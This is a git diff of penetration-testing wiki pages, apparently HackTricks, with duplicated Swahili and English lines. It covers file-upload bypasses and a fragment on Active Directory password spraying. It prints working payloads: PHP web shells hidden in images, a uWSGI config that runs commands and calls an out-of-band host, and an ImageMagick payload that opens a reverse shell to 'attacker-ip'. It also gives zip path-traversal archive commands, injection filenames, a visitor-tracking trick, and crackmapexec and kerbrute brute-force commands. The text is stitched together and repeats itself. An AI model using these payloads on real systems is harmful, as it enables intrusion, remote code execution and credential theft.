`\` or you could also **introduce the payload directly** in an image:\
`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
- Ikiwa **compression** inaongezwa kwa picha yako, kwa mfano kwa kutumia maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu zilizotangulia hazitafaa. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuweka baadhi ya maandishi ambayo yataendelea kuwepo baada ya compression.
- If **compressions is being added to your image**, for example using some standard PHP libraries like [PHP-GD](https://www.php.net/manual/fr/book.image.php), the previous techniques won't be useful it. However, you could use the **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
- Ukurasa wa wavuti pia unaweza kuwa unafanya **resizing** kwa **picha**, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi ambayo yataendelea kuwepo baada ya compression.
- The web page cold also be **resizing** the **image**, using for example the PHP-GD functions `imagecopyresized` or `imagecopyresampled`. However, you could use the **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
- Mbinu nyingine ya kutengeneza payload ambayo **itaishi wakati wa resizing ya picha**, kutumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi ambayo yataendelea kuwepo baada ya compression.
- Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
### Mbinu Nyingine za Kuangalia
### Other Tricks to check
- Tafuta udhaifu wa **rename** ya faili iliyopakiwa tayari (kubadilisha extension).
- Tafuta udhaifu wa **Local File Inclusion** ili kuendesha backdoor.
- **Uwezekano wa kufichuliwa kwa taarifa**:
1. Pakia **mara kadhaa** (na kwa **wakati mmoja**) **faili ile ile** yenye **jina lile lile**
2. Pakia faili yenye **jina** la **faili** au **folda** ambayo **tayari ipo**
3. Kupakia faili yenye **"." , "..", au "…" kama jina lake**. Kwa mfano, kwenye Apache katika **Windows**, kama application inahifadhi faili zilizopakuliwa katika saraka "/www/uploads/", filename "." itaunda faili iitwayo "uploads" katika saraka "/www/".
4. Pakia faili ambayo haiwezi kufutwa kwa urahisi kama **"…:.jpg”** katika **NTFS**. (Windows)
5. Pakia faili katika **Windows** na **herufi zisizo halali** kama `|<>*?”` katika jina lake. (Windows)
6. Pakia faili katika **Windows** ukitumia majina yaliyohifadhiwa (**reserved**) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
- Jaribu pia kupakia executable (.exe) au **.html** (inayofanana kidogo) ambayo **itaendesha code** wakati itafunguliwa bila kukusudia na mwathirika.
- Find a vulnerability to **rename** the file already uploaded (to change the extension).
- Find a **Local File Inclusion** vulnerability to execute the backdoor.
- **Possible Information disclosure**:
1. Upload **several times** (and at the **same time**) the **same file** with the **same name**
2. Upload a file with the **name** of a **file** or **folder** that **already exists**
3. Uploading a file with **".”, "..”, or "…” as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in "/www/uploads/” directory, the ".” filename will create a file called "uploads” in the "/www/” directory.
4. Upload a file that may not be deleted easily such as **"…:.jpg”** in **NTFS**. (Windows)
5. Upload a file in **Windows** with **invalid characters** such as `|<>*?”` in its name. (Windows)
6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
- Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim.
### Mbinu maalum za extension
### Special extension tricks
Ikiwa unajaribu kupakia faili kwenye **PHP server**, [tazama mbinu ya **.htaccess** ya kutekeleza code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
Ikiwa unajaribu kupakia faili kwenye **ASP server**, [tazama mbinu ya **.config** ya kutekeleza code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
Faili za `.phar` ni kama `.jar` kwa java, lakini kwa php, na zinaweza kutumika kama faili ya php (kuitekeleza na php, au kuiingiza ndani ya script...)
The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** (executing it with php, or including it inside a script...)
Extension `.inc` wakati mwingine inatumika kwa faili za php zinazotumika tu kuingiza faili, hivyo, katika sehemu fulani, mtu anaweza kuruhusu **extension hii itekelezwe**.
The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
## **Jetty RCE**
Ikiwa unaweza kupakia faili ya XML kwenye server ya Jetty unaweza kupata [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hiyo, kama ilivyotajwa kwenye picha ifuatayo, pakia faili ya XML kwenye `$JETTY_BASE/webapps/` na tarajia shell!
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
## **uWSGI RCE**
Kwa uchambuzi wa kina wa udhaifu huu angalia utafiti wa awali: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
For a detailed exploration of this vulnerability check the original research: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Remote Command Execution (RCE) vulnerabilities zinaweza kutumika kwenye server za uWSGI kama mtu ana uwezo wa kubadilisha faili ya usanidi `.ini`. Faili za usanidi za uWSGI zinatumia syntax maalumu kuingiza "magic" variables, placeholders, na operators. Huduma ya '@' operator, inayotumika kama `@(filename)`, imetengenezwa kuingiza yaliyomo ya faili. Miongoni mwa schemes mbalimbali zinazotumika katika uWSGI, scheme ya "exec" ni yenye nguvu sana, ikiruhusu kusoma data kutoka kwa standard output ya process. Kipengele hiki kinaweza kutumika kwa madhumuni mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati faili ya usanidi `.ini` inapotubaliwa.
Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the `.ini` configuration file. uWSGI configuration files leverage a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, utilized as `@(filename)`, is designed to include the contents of a file. Among the various supported schemes in uWSGI, the "exec" scheme is particularly potent, allowing the reading of data from a process's standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a `.ini` configuration file is processed.
Tazama mfano ufuatao wa faili hatari ya `uwsgi.ini`, ikionyesha schemes mbalimbali:
Consider the following example of a harmful `uwsgi.ini` file, showcasing various schemes:
```ini
[uwsgi]
; read from a symbol
@ -126,14 +126,14 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
Utekelezaji wa payload hufanyika wakati faili ya usanidi inapoangaliwa (kuchambuliwa). Ili usanidi uanze kutumika na kuchambuliwa, mchakato wa uWSGI lazima uanzishwe upya (huenda baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa ku-auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, hurudisha faili kwa vipindi vilivyobainishwa pindi kinapogundua mabadiliko.
The execution of the payload occurs during the parsing of the configuration file. For the configuration to be activated and parsed, the uWSGI process must either be restarted (potentially after a crash or due to a Denial of Service attack) or the file must be set to auto-reload. The auto-reload feature, if enabled, reloads the file at specified intervals upon detecting changes.
Ni muhimu kuelewa jinsi uchambuzi wa faili ya usanidi wa uWSGI unavyokuwa mpole. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama picha au PDF), na hivyo kupanua zaidi wigo wa matumizi mabaya yanayoweza kutokea.
Ni muhimu kuelewa upole wa parsing wa faili za configuration za uWSGI. Hasa, payload inayojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), na hivyo kupanua wigo wa udhaifu unaowezekana.
## **wget File Upload/SSRF Trick**
Katika baadhi ya matukio unaweza kugundua kuwa server inatumia **`wget`** kupakua **faili** na unaweza **onyesha** **URL**. Katika kesi hizi, code inaweza kuwa inakagua kwamba extension ya faili zilizopakuliwa iko ndani ya whitelist ili kuhakikisha kwamba ni faili tu zilizoidhinishwa zitakapopakuliwa. Hata hivyo, **this check can be bypassed.**\
Urefu wa **maximum** wa **filename** katika **linux** ni **255**, hata hivyo, **wget** hukata majina ya faili hadi **236** characters. Unaweza **pakua faili inayoitwa "A"\*232+".php"+".gif"**, jina hili la faili lita **bypass** the **check** (kama katika mfano huu **".gif"** ni extension **valid**) lakini `wget` itawabadilisha jina la faili kuwa **"A"\*232+".php"**.
In some occasions you may find that a server is using **`wget`** to **kupakua mafaili** and you can **kuonyesha** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **hii ukaguzi inaweza kupitishwa.**\
The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"\*232+".php"**.
```bash
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
@ -156,35 +156,35 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
2020-06-13 03:14:06 (1.96 MB/s) - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php saved [10/10]
```
Kumbuka kwamba **chaguo jingine** unaloweza kufikiria ili kupita ukaguzi huu ni kufanya **HTTP server i-rekibishe (redirect) hadi faili tofauti**, ili URL ya awali itapita ukaguzi lakini wget itapakua faili iliyorekebishwa kwa jina jipya. Hii **haitafanya kazi** **isipokuwa** wget inatumika na **parameter** `--trust-server-names` kwa sababu **wget itapakua ukurasa uliorekebishwa kwa jina la faili lililoainishwa kwenye URL ya asili**.
Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
## Zana
## Vifaa
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu file upload mechanisms. Inatumia mbinu mbalimbali za bug bounty kurahisisha mchakato wa kutambua na exploiting vulnerabilities, ikihakikisha tathmini kamilifu za web applications.
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
### Corrupting upload indices with snprintf quirks (historical)
Baadhi ya legacy upload handlers zinazotumia `snprintf()` au zenye mitindo sawa kujenga multi-file arrays kutoka upload ya single-file zinaweza kudanganywa ili kutengeneza muundo wa `_FILES`. Kutokana na kutokuwepo kwa konsistensi na kukatwa (truncation) katika tabia ya `snprintf()`, upload moja iliyotengenezwa kwa uangalifu inaweza kuonekana kama faili nyingi zenye index upande wa server, ikachanganya mantiki inayodhani muundo thabiti (mfano, kuitendea kama multi-file upload na kuingia kwenye branches zisizo salama). Ingawa ni niche leo, mtindo huu wa “index corruption” mara kwa mara unaibukia tena katika CTFs na codebases za zamani.
Some legacy upload handlers that use `snprintf()` or similar to build multi-file arrays from a single-file upload can be tricked into forging the `_FILES` structure. Due to inconsistencies and truncation in `snprintf()` behavior, a carefully crafted single upload can appear as multiple indexed files on the server side, confusing logic that assumes a strict shape (e.g., treating it as a multi-file upload and taking unsafe branches). While niche today, this “index corruption” pattern occasionally resurfaces in CTFs and older codebases.
## Kutoka File upload hadi vulnerabilities nyingine
## From File upload to other vulnerabilities
- Weka **filename** kuwa `../../../tmp/lol.png` na ujaribu kufanikisha **path traversal**
- Weka **filename** kuwa `sleep(10)-- -.jpg` na huenda ukaweza kufanikisha **SQL injection**
- Weka **filename** kuwa `<svg onload=alert(document.domain)>` ili kufanikisha XSS
- Weka **filename** kuwa `; sleep 10;` kujaribu baadhi ya command injection (more [command injections tricks here](../command-injection.md))
- Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
- Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
- Set **filename** to `<svg onload=alert(document.domain)>` to achieve a XSS
- Set **filename** to `; sleep 10;` to test some command injection (more [command injections tricks here](../command-injection.md))
- [**XSS** in image (svg) file upload](../xss-cross-site-scripting/index.html#xss-uploading-files-svg)
- **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/index.html#xss-abusing-service-workers)
- [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
- Ikiwa unaweza **kuonyesha web server kuchukua picha kutoka kwa URL** unaweza kujaribu kuabusu [SSRF](../ssrf-server-side-request-forgery/index.html). Ikiwa **image** hii itahifadhiwa kwenye tovuti ya **public**, unaweza pia kutaja URL kutoka [https://iplogger.org/invisible/] na **kuiba taarifa za kila mtembeleaji**.
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
- Pakia \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) ili kuangalia kama server ina **antivirus**
- Angalia kama kuna **size limit** wakati wa kupakia faili
- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
- Check if there is any **size limit** uploading files
Hapa kuna orodha ya top 10 ya mambo unayoweza kufanikisha kwa kupakia (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
Heres a top 10 list of things that you can achieve by uploading (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
2. **SVG**: Stored XSS / SSRF / XXE
@ -209,34 +209,34 @@ https://github.com/portswigger/upload-scanner
- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
- **JPG**: `"\xff\xd8\xff"`
Rejelea [https://en.wikipedia.org/wiki/List_of_file_signatures] kwa aina nyingine za faili.
Refer to [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) for other filetypes.
## Zip/Tar File Automatically decompressed Upload
Ikiwa unaweza kupakia ZIP ambayo itatolewa (decompressed) ndani ya server, unaweza kufanya vitu 2:
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
### Symlink
Pakia archive yenye soft links kuelekea faili nyingine; kisha, ukifungua faili zilizotolewa utapata kufikia faili zilizounganishwa:
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Fungua (decompression) katika folda tofauti
### Decompress in different folders
Uundaji usiotarajiwa wa faili katika folda wakati wa kufungua (decompression) ni tatizo kubwa. Licha ya dhana za awali kwamba usanidi huu ungeweza kuzuia utekelezaji wa amri za ngazi ya OS kupitia upakiaji wa faili zenye madhumuni mabaya, msaada wa compression wa muundo wa kihieraki na uwezo wa directory traversal wa muundo wa ZIP yanaweza kutumika vibaya. Hii inawawezesha wadukuzi kupita vikwazo na kutoroka kutoka kwenye folda za upload zilizo salama kwa kuathiri utendaji wa kufungua (decompression) wa programu inayolengwa.
Uundaji usiotarajiwa wa faili ndani ya folda wakati wa ufunguaji ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu ungeweza kuzuia OS-level command execution kupitia malicious file uploads, msaada wa compression wa hierarkia na uwezo wa directory traversal wa ZIP archive format unaweza kutumika vibaya. Hii inawawezesha washambulizi kupitisha vikwazo na kutoka kwenye folda za upload zilizo salama kwa kuyabadilisha kazi ya ufunguaji ya programu lengwa.
Exploit ya kiotomatiki ya kutengeneza faili kama haya inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo:
Exploit otomatiki ya kutengeneza faili hizo inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo:
```python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
Vilevile, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa uendeshaji wake.
Zaidi ya hayo, the **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, tengeneza symlink ya faili hiyo kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa operesheni yake.
Hapo chini kuna mfano wa Python code inayotumika kuunda zip file yenye madhara:
Hapo chini kuna mfano wa Python code inayotumika kuunda malicious zip file:
```python
#!/usr/bin/python
import zipfile
@ -254,11 +254,11 @@ zip.close()
create_zip()
```
**Abusing compression for file spraying**
**Kunyanyasa ukandamizaji kwa file spraying**
Kwa maelezo zaidi **angalia chapisho la asili katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
Kwa maelezo zaidi **angalia chapisho la awali katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
1. **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazotumwa kupitia `$_REQUEST` variable.
1. **Creating a PHP Shell**: PHP code imeandikwa kutekeleza amri zinazopitishwa kupitia `$_REQUEST`.
```php
<?php
@ -268,14 +268,14 @@ system($cmd);
}?>
```
2. **File Spraying and Compressed File Creation**: Faili nyingi zimetengenezwa na archive ya zip imeundwa ikijumuisha faili hizi.
2. **File Spraying and Compressed File Creation**: Faili nyingi zinaundwa na archive ya zip inatengenezwa ikijumuisha faili hizi.
```bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
```
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yanabadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwenye directories.
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yabadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwa directories.
```bash
:set modifiable
@ -285,40 +285,40 @@ root@s2crew:/tmp# zip cmd.zip xx*.php
## ImageTragic
Pakia yaliyomo haya kwa extension ya picha ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (kutoka kwenye [exploit](https://www.exploit-db.com/exploits/39767))
Pakia yaliyomo haya ukiwa na extension ya image ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (from the [exploit](https://www.exploit-db.com/exploits/39767))
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
## Kuingiza PHP Shell ndani ya PNG
## Kuingiza PHP Shell kwenye PNG
Kuingiza PHP shell katika IDAT chunk ya faili ya PNG kunaweza kwa ufanisi kuzipita baadhi ya operesheni za usindikaji wa picha. Fungsheni `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum hapa, kwani mara nyingi hutumika kwa kubadilisha ukubwa na resampling ya picha, mtawalia. Uwezo wa PHP shell iliyowekwa kuendelea bila kuathiriwa na operesheni hizi ni faida muhimu kwa baadhi ya matumizi.
Kuingiza PHP shell katika IDAT chunk ya faili ya PNG kunaweza kupita kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Fungsheni `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani kawaida hutumika kwa kubadilisha ukubwa (resizing) na kurejesha sampuli (resampling) picha, mtawalia. Uwezo wa PHP shell iliyowekwa kubaki bila kuathiriwa na operesheni hizi ni faida kubwa kwa matumizi fulani.
Uchambuzi wa kina wa mbinu hii, ukijumuisha metodolojia na matumizi yanayowezekana, umeelezewa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
Uchambuzi wa kina wa mbinu hii, ikiwa ni pamoja na metodolojia yake na matumizi yanayowezekana, umetolewa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa wa kina wa mchakato na athari zake.
More information in: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
## Faili za Polyglot
## Polyglot Files
Faili za polyglot ni chombo cha kipekee katika usalama wa mtandao, zikifanya kazi kama chameleon zinazoweza kuwepo kwa uhalali katika miundo mingi ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), hybrid inayofanya kazi kama GIF na RAR archive. Faili hizi hazijafungwa kwa jozi hii pekee; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Polyglot Files hutumika kama chombo maalum katika security, zikiw behaving kama chameleons zinazoweza kuwepo kwa uhalali katika miundo mingi ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), mseto unaofanya kazi kama GIF na pia kama RAR archive. Faili hizo hazizuiliki kwa mchanganyiko huo tu; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Manufaa kuu ya faili za polyglot ni uwezo wao wa kuzunguka hatua za usalama ambazo huchuja faili kwa misingi ya aina. Kazi ya kawaida katika programu mbalimbali ni kuruhusu aina maalum za faili tu kwa upload—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na miundo inayoweza kuwa hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kuzingatia vigezo vya muundo vya aina nyingi za faili, inaweza kwa utulivu kupita kizuizi hicho.
Faida kuu ya polyglot files iko katika uwezo wao wa kuzunguka udhibiti wa usalama unaochuja faili kwa msingi wa aina. Mazoezi ya kawaida katika programu mbalimbali ni kuruhusu aina maalum za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari zaidi inayotokana na miundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kuzingatia vigezo vya muundo vya aina nyingi za faili, inaweza kupita vikwazo hivi kwa uwazi.
Licha ya ufanifu wao, polyglots hukutana na vizingiti. Kwa mfano, huku polyglot inaweza kuonyesha kwa wakati mmoja PHAR file (PHp ARchive) na JPEG, mafanikio ya upload yake yanaweza kutegemea sera za jukwaa kuhusu extension za faili. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, udual wa muundo wa polyglot peke yake huenda usitosheleze kuhakikisha upload yake.
Licha ya urekebishaji wao, polyglots wanakabiliwa na vizingiti. Kwa mfano, wakati polyglot inaweza kuwakilisha kwa wakati mmoja faili ya PHAR (PHp ARchive) na JPEG, ufanisi wa kupakia inaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, udualiti wa muundo tu wa polyglot huenda usitosheleze kuhakikisha kupakiwa kwake.
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
### Kupakia JSON sahihi kana kwamba ni PDF
### Upload valid JSONs like if it was PDF
Jinsi ya kuepuka utambuzi wa aina ya faili kwa kupakia faili ya JSON halali hata kama haikuruhusiwa kwa kudanganya kuwa PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
How to avoid file type detections by uploading a valid JSON file even if not allowed by faking a PDF file (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
- **`mmmagic` library**: Mradi tu biti za magic `%PDF` ziko katika 1024 za kwanza ni halali (angalia mfano kwenye chapisho)
- **`pdflib` library**: Ongeza fake PDF format ndani ya field ya JSON ili library ifikiri ni pdf (angalia mfano kwenye chapisho)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Tengeneza JSON kubwa zaidi ya hiyo ili haiwezi kuchambua maudhui kama json kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itafikiri ni PDF
- **`mmmagic` library**: As long as the `%PDF` magic bytes are in the first 1024 bytes its valid (get example from post)
- **`pdflib` library**: Add a fake PDF format inside a filed of the JSON so the library thinks its a pdf (get example from post)
- **`file` binary**: It can read up to 1048576 bytes from a file. Just create a JSON bigger than that so it cannot parse the content as a json and then inside the JSON put the initial part of a real PDF and itll think its a PDF
## Marejeo
## Marejeleo
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
- [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)

84
src/windows-hardening/active-directory-methodology/password-spraying.md
View File

@ -5,16 +5,16 @@
## **Password Spraying**
Mara unapopata kadhaa za **valid usernames**, unaweza kujaribu **common passwords** (kumbuka password policy ya mazingira)\
Kwa chaguo-msingi, **minimum** **password** **length** ni **7**.
Mara tu unapopata kadhaa za **valid usernames**, unaweza kujaribu **common passwords** za kawaida zaidi (kumbuka password policy ya mazingira) kwa kila mtumiaji uliogunduliwa.\
Kwa **default** the **minimum** **password** **length** ni **7**.
Orodha za **common usernames** pia zinaweza kuwa muhimu: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
Kumbuka kwamba unaweza lockout baadhi ya accounts ikiwa utajaribu several wrong passwords (kwa chaguo-msingi zaidi ya 10).
Kumbuka kwamba **could lockout some accounts if you try several wrong passwords** (kwa default zaidi ya 10).
### Pata password policy
Ikiwa una some user credentials au shell kama domain user unaweza kupata password policy kwa:
Kama una baadhi ya **user credentials** au **shell** kama **domain user** unaweza **get the password policy with**:
```bash
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
@ -47,29 +47,29 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
